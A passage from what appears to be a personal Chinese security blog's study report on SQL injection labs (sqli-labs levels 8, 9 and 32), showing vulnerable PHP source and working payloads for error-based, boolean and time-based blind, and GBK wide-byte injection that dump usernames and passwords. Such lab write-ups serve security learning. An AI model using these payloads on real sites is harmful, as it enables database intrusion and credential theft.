<p>由于通过updatexml报错最多只能返回32个字符，所以可以对payload进行改进，通过增加limit来实现位置偏移拿到所有的信息。<code>?id=1&#39; and extractvalue(1,concat(0x7e,(select column_name from information_schema.columns where table_name=&#39;users&#39; limit 0,1),0x7e)) --+</code>。删除了原有的group_concat()函数，增加了<code>limit a,b</code> 函数,a代表起始数，b代表步数。所以通过固定b=1，a=0开始每次增1就可以读到所有数据。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230211945252.png" alt="image-20201230211945252"></p>
</li>
<li><p>通过查询列名获得了两个敏感的列分别是username和password。接着爆数据值<code>?id=1&#39; and extractvalue(1,concat(0x7e,(select concat(username, 0x7e, password) from users limit 0,1 ),0x7e)) --+</code>，同理，通过遍历limit第一个字段的值就可以取到所有的数据。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230212319296.png" alt="image-20201230212319296"></p>
</li>
</ol>
<h2 id="0x03-盲注的代码"><a href="#0x03-盲注的代码" class="headerlink" title="0x03 盲注的代码"></a>0x03 盲注的代码</h2><h3 id="1-布尔盲注"><a href="#1-布尔盲注" class="headerlink" title="1.布尔盲注"></a>1.布尔盲注</h3><p>靶场第八关，源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line">$sql=<span class="string">"SELECT * FROM users WHERE id='$id' LIMIT 0,1"</span>;</span><br><span class="line">$result=mysql_query($sql);</span><br><span class="line">$row = mysql_fetch_array($result);</span><br><span class="line"></span><br><span class="line">	<span class="keyword">if</span>($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;	</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'You are in...........'</span>;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">	<span class="keyword">else</span> </span><br><span class="line">	&#123;</span><br><span class="line">	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;&lt;/font&gt;"</span>;	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size= 3&gt;'</span>;	</span><br><span class="line">	</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123; <span class="keyword">echo</span> <span class="string">"Please input the ID as parameter with numeric value"</span>;&#125;</span><br></pre></td></tr></table></figure>

<p>通过对代码进行分析发现语句输入正确时会打印一个’You are in…..’，而错误的输出信息消失了。如果构造一条语句请求已知只会有两种结果，回显信息和不回显，所以我们可以通过构造字段去猜测数据库名字等。</p>
<blockquote>
<p>常用的函数</p>
<ol>
<li>left(a,b)：从a的左侧截取b位</li>
<li>substr(a,b,c) ：字符串a的下标值b到c之间的字符</li>
<li>ascii(a) ：将a转换成assic码值</li>
<li>length(a)：返回字符串a的长度</li>
</ol>
</blockquote>
<ul>
<li><p><code>?id=1&#39; and (ascii(substr((select database()) ,1,1))) = 115--+</code> assic值115对应的字符为s，数据库第一个字符为s，如果是则有回显，不是则无回显。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201230215511126.png" alt="image-20201230215511126"></p>
</li>
<li><p><code>?id=1&#39; and left(database(),1)&gt;&#39;s&#39;--+</code> 第一个字符的assic值是否大于s，大于则有回显</p>
</li>
<li><p><code>?id=1&#39; and length(database()) = 8 --+</code>数据库名的长度是否为8，正确则有回显</p>
</li>
</ul>
<p>通过上面这种方法，改变逻辑关系&gt; &lt; =，通过编写脚本可以快速跑出相对应的值。</p>
<h3 id="2-时间盲注"><a href="#2-时间盲注" class="headerlink" title="2.时间盲注"></a>2.时间盲注</h3><p>靶场第九关，源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span>($row)</span><br><span class="line">	&#123;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;	</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">'You are in...........'</span>;</span><br><span class="line">  	<span class="keyword">echo</span> <span class="string">"&lt;br&gt;"</span>;</span><br><span class="line">    	<span class="keyword">echo</span> <span class="string">"&lt;/font&gt;"</span>;</span><br><span class="line">  	&#125;</span><br><span class="line">	<span class="keyword">else</span> </span><br><span class="line">	&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font size="5" color="#FFFF00"&gt;'</span>;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'You are in...........'</span>;</span><br><span class="line">	<span class="comment">//print_r(mysql_error());</span></span><br><span class="line">	<span class="comment">//echo "You have an error in your SQL syntax";</span></span><br><span class="line">	<span class="keyword">echo</span> <span class="string">"&lt;/br&gt;&lt;/font&gt;"</span>;	</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">'&lt;font color= "#0000ff" font size= 3&gt;'</span>;	</span><br><span class="line">	&#125;</span><br></pre></td></tr></table></figure>

<p>通过对源代码分析，发现不管输入什么都会回显’You are in…..’，也就是说我们不知道sql语句到底执行了没有。</p>
<blockquote>
<p>常用函数 if(exp1,exp2,exp3) </p>
<p>作用：如果exp1为真则执行exp2，否则执行exp3</p>
</blockquote>
<p>由上，可以利用if函数构造payload。if(payload,1,sleep(5)) ，如果查询的payload为真，则立即返回否则页面休眠5秒。<strong>通过if语句我们人为的构造出来了一个布尔逻辑，利用方式与上面相同</strong></p>
<ul>
<li><p><code>?id=1&#39; and if(length(database()) = 8,1,sleep(5)) --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231103645169.png" alt="image-20201231103645169"></p>
<p>而当长度变为5时(实际长度是8)，相应时间明显变长</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231103850645.png" alt="image-20201231103850645"></p>
</li>
<li><p>判断逻辑与布尔盲注相同了，只不过这里通过延迟来判断语句是否执行正确</p>
</li>
<li><p><code>?id=1&#39; and if(ascii(substr((select database()) ,1,1)) = 115,1,sleep(5)) --+</code>assic值115对应的字符为s，数据库第一个字符为s，如果是则立即刷新页面，不是则等待5秒后刷新页面。</p>
</li>
<li><p><code>?id=1&#39; and if(left(database(),1)&gt;&#39;s&#39; ,1,1)) = 115,1,sleep(5)) --+</code> 第一个字符的assic值是否大于s，大于则立即刷新页面</p>
</li>
<li><p>通过各种逻辑关系的组合，可以推出数据关系。</p>
</li>
</ul>
<h2 id="0x04-编写宽字节注入的代码"><a href="#0x04-编写宽字节注入的代码" class="headerlink" title="0x04 编写宽字节注入的代码"></a>0x04 编写宽字节注入的代码</h2><p>靶场第32关，源代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//这个函数的作用是将用户输入的'与''变为转义成为内容(即添加\)从而避免了sql攻击</span></span><br><span class="line"><span class="function"><span class="keyword">function</span> <span class="title">check_addslashes</span><span class="params">($string)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">     <span class="comment">//避开任何反斜杠，将\转化为\\</span></span><br><span class="line">    $string = preg_replace(<span class="string">'/'</span>. preg_quote(<span class="string">'\\'</span>) .<span class="string">'/'</span>, <span class="string">"\\\\\\"</span>, $string);   </span><br><span class="line">    <span class="comment">//用反斜杠转义单引号，将'转化为\'</span></span><br><span class="line">    $string = preg_replace(<span class="string">'/\'/i'</span>, <span class="string">'\\\''</span>, $string);  </span><br><span class="line">    <span class="comment">//用反斜杠转义单引号转义双引号，将"转化为\"</span></span><br><span class="line">    $string = preg_replace(<span class="string">'/\"/'</span>, <span class="string">"\\\""</span>, $string); </span><br><span class="line">    <span class="keyword">return</span> $string;</span><br><span class="line">&#125;</span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>通过对源码分析，我们发现之前用<code>&#39;(或%27)</code>来闭合sql语句的方法失效了，为了避免<code>&#39;</code>与<code>&quot;</code>被转义一般有两个思路：一个是让转义符失去作用(即再添加一个<code>\</code>注释掉之后的<code>\</code>，<code>df%5c%5c</code>)；一个是让转义符消失。而通过宽字节注入的原理就是基于第二种，让转义符变内容的一部分从而让转义符消失。</p>
<blockquote>
<p>宽字节：因为汉字比较多，一般占用两个字符来表示，即为宽字节。</p>
<p>常用的宽字节编码：GB2312、GBK、GB18030</p>
<p>宽字节注入原理：在转义符<code>\</code>前构造一个特殊值与之结合形成一个汉字，从而使转义符消失。转义符的编码为%5c，而在数据库GBK编码中，<code>%df%5c</code>恰好为繁体字<code>連</code>的代码</p>
</blockquote>
<ul>
<li><p><code>?id=-1&#39; UNION SELECT 1,2,DATABASE() --+</code> 可以发现<code>&#39;</code>被注释掉了，没有回显信息。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231133446179.png" alt="image-20201231133446179"></p>
</li>
<li><p><code>?id=-1%df&#39; UNION SELECT 1,2,DATABASE() --+</code> 增加了一个<code>%df</code>，数据库实际接收到的字符为<code>%df%5c%27</code> ,如果数据库是GBK编码<code>%df%5c</code>会被译为<code>連</code>,而<code>%27</code>正好是一个<code>&#39;</code>，闭合了sql语句。</p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231134015958.png" alt="image-20201231134015958"></p>
</li>
<li><p>接下来就是常规的注入流程了。</p>
<ol>
<li><p>爆数据表<code>?id=-1%df&#39; union select 1,2,(select group_concat(table_name) from information_schema.tables where table_schema=database()) --+</code>   </p>
</li>
<li><p>从users表中获取字段<code>?id=-1%df&#39; union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=&#39;users&#39;) --+</code>   <strong>因为有转义，所以尽量不使用<code>&#39;</code>，会报错。所以将<code>users</code>转化为十六进制格式<code>0x7573657273</code></strong></p>
<p>获取表的正确写法<code>?id=-1%df&#39; union select 1,2,(select group_concat(column_name) from information_schema.columns where table_name=0x7573657273) --+</code></p>
</li>
<li><p>获取字段相对应的数据<code>?id=-1%df&#39; union select 1,2,(select group_concat(concat(username, 0x7e, password)) from users) --+</code></p>
<p><img src="/2021/01/06/第十周：注入代码编写与环境搭建/image-20201231173039055.png" alt="image-20201231173039055"></p>
</li>
</ol>
</li>
</ul>
<h2 id="0x05-参考文章"><a href="#0x05-参考文章" class="headerlink" title="0x05 参考文章"></a>0x05 参考文章</h2><ul>
<li><a href="https://blog.csdn.net/cpriluke/article/details/106964276" target="_blank" rel="noopener">https://blog.csdn.net/cpriluke/article/details/106964276</a></li>
<li><a href="https://www.sqlsec.com/2020/05/sqlilabs.html#toc-heading-4" target="_blank" rel="noopener">https://www.sqlsec.com/2020/05/sqlilabs.html#toc-heading-4</a></li>
<li><a href="https://cloud.tencent.com/developer/article/1077894" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1077894</a></li>
<li><a href="https://cloud.tencent.com/developer/article/1518647" target="_blank" rel="noopener">https://cloud.tencent.com/developer/article/1518647</a></li>
<li><a href="https://blog.csdn.net/qq_37873738/article/details/88042610" target="_blank" rel="noopener">https://blog.csdn.net/qq_37873738/article/details/88042610</a></li>
<li><a href="https://www.cnblogs.com/-qing-/p/11610385.html#lab1" target="_blank" rel="noopener">https://www.cnblogs.com/-qing-/p/11610385.html#lab1</a></li>
<li><a href="https://blog.csdn.net/zpy1998zpy/article/details/80631036" target="_blank" rel="noopener">https://blog.csdn.net/zpy1998zpy/article/details/80631036</a></li>
<li><a href="https://blog.csdn.net/pygain/article/details/53086389" target="_blank" rel="noopener">https://blog.csdn.net/pygain/article/details/53086389</a></li>
<li><a href="https://www.cnblogs.com/Rain99-/p/10583406.html" target="_blank" rel="noopener">https://www.cnblogs.com/Rain99-/p/10583406.html</a></li>
<li><a href="https://blog.csdn.net/m0_46315342/article/details/106557979" target="_blank" rel="noopener">https://blog.csdn.net/m0_46315342/article/details/106557979</a></li>
</ul>

      
    </div>
    
    
    

    

    

    
      <div>
        <ul class="post-copyright">
  <li class="post-copyright-author">
    <strong>本文作者：</strong>
    Bu1
  </li>
<li class="post-copyright-link">
  <strong>本文链接：</strong>
  <a href="http://bu1.github.io/2021/01/06/第十周：注入代码编写与环境搭建/" title="第十周：注入代码编写与环境搭建">http://bu1.github.io/2021/01/06/第十周：注入代码编写与环境搭建/</a>
</li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>
    本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/3.0/" rel="external nofollow" target="_blank">CC BY-NC-SA 3.0</a> 许可协议。转载请注明出处！
  </li>
</ul>

      </div>
    
	<div>
      
        <div>
    
        <div style="text-align:center;color: #ccc;font-size:14px;">-------------END<i class="fa fa-paw"></i>-------------</div>
    
</div>
      
    </div>
    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/2020/07/05/利用云函数实现T00ls全自动化签到/" rel="next" title="利用云函数实现T00ls全自动化签到">
                <i class="fa fa-chevron-left"></i> 利用云函数实现T00ls全自动化签到
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/2021/01/06/第十一周：手工测试之前编写的注入环境/" rel="prev" title="第十一周：手工测试之前编写的注入环境">
                第十一周：手工测试之前编写的注入环境 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>

  
  
  
  
  



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  
    <div class="comments" id="comments">
      <div id="disqus_thread">
        <noscript>
          Please enable JavaScript to view the
          <a href="https://disqus.com/?ref_noscript">comments powered by Disqus.</a>
        </noscript>
      </div>
    </div>

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            文章目录
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            站点概览
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image" src="/images/avatar.png" alt="Bu1">
            
              <p class="site-author-name" itemprop="name">Bu1</p>
              <p class="site-description motion-element" itemprop="description">最为惊艳的是思想碰撞产生的火花。</p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives/">
              
                  <span class="site-state-item-count">25</span>
                  <span class="site-state-item-name">日志</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">7</span>
                  <span class="site-state-item-name">分类</span>
                </a>
              </div>
            

            

          </nav>

          

          

          
          

          
          
            <div class="links-of-blogroll motion-element links-of-blogroll-block">
              <div class="links-of-blogroll-title">
                <i class="fa  fa-fw fa-link"></i>
                Links
              </div>
              <ul class="links-of-blogroll-list">
                
                  <li class="links-of-blogroll-item">
                    <a href="https://tanpuhan.github.io" title="CoCo1er" target="_blank">CoCo1er</a>
                  </li>
                
                  <li class="links-of-blogroll-item">
                    <a href="http://www.y1nhui.com" title="y1nhui" target="_blank">y1nhui</a>
                  </li>
                
              </ul>
            </div>
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）"><span class="nav-number">1.</span> <span class="nav-text">任务标题：安全之各种注入类型的环境搭建和代码编写（使用什么语言，自选）</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#第一级：完全不懂，没有一点开发经验的"><span class="nav-number">1.0.0.1.</span> <span class="nav-text">第一级：完全不懂，没有一点开发经验的</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第二级：懂点-PHP-编程语法，能看懂-php-代码的"><span class="nav-number">1.0.0.2.</span> <span class="nav-text">第二级：懂点 PHP 编程语法，能看懂 php 代码的</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#第三级：会写-php-并且懂一些前端-js、html-等基础"><span class="nav-number">1.0.0.3.</span> <span class="nav-text">第三级：会写 php 并且懂一些前端 js、html 等基础</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#其他情况"><span class="nav-number">1.0.0.4.</span> <span class="nav-text">其他情况</span></a></li></ol></li></ol><li class="nav-item nav-level-1"><a class="nav-link" href="#学习报告"><span class="nav-number">2.</span> <span class="nav-text">学习报告</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#0x00-环境搭建"><span class="nav-number">2.1.</span> <span class="nav-text">0x00 环境搭建</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x01-常规回显的注入代码"><span class="nav-number">2.2.</span> <span class="nav-text">0x01 常规回显的注入代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x02-报错注入的代码"><span class="nav-number">2.3.</span> <span class="nav-text">0x02 报错注入的代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x03-盲注的代码"><span class="nav-number">2.4.</span> <span class="nav-text">0x03 盲注的代码</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#1-布尔盲注"><span class="nav-number">2.4.1.</span> <span class="nav-text">1.布尔盲注</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#2-时间盲注"><span class="nav-number">2.4.2.</span> <span class="nav-text">2.时间盲注</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x04-编写宽字节注入的代码"><span class="nav-number">2.5.</span> <span class="nav-text">0x04 编写宽字节注入的代码</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#0x05-参考文章"><span class="nav-number">2.6.</span> <span class="nav-text">0x05 参考文章</span></a></li></ol></li></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; 2018 &mdash; <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">Bu1</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
      <span class="post-meta-item-text">Site words total count&#58;</span>
    
    <span title="Site words total count">54.3k</span>
  
</div>


  <!--<div class="powered-by">由 <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a> 强力驱动</div>"



  <span class="post-meta-divider">|</span>



  <div class="theme-info">主题 &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Muse</a> v5.1.4</div>-->




        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  

    
      <script id="dsq-count-scr" src="https://.disqus.com/count.js" async></script>
    

    
      <script type="text/javascript">
        var disqus_config = function () {
          this.page.url = 'http://yoursite.com/2021/01/06/第十周：注入代码编写与环境搭建/';
          this.page.identifier = '2021/01/06/第十周：注入代码编写与环境搭建/';
          this.page.title = '第十周：注入代码编写与环境搭建';
        };
        var d = document, s = d.createElement('script');
        s.src = 'https://.disqus.com/embed.js';
        s.setAttribute('data-timestamp', '' + +new Date());
        (d.head || d.body).appendChild(s);
      </script>
    

  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
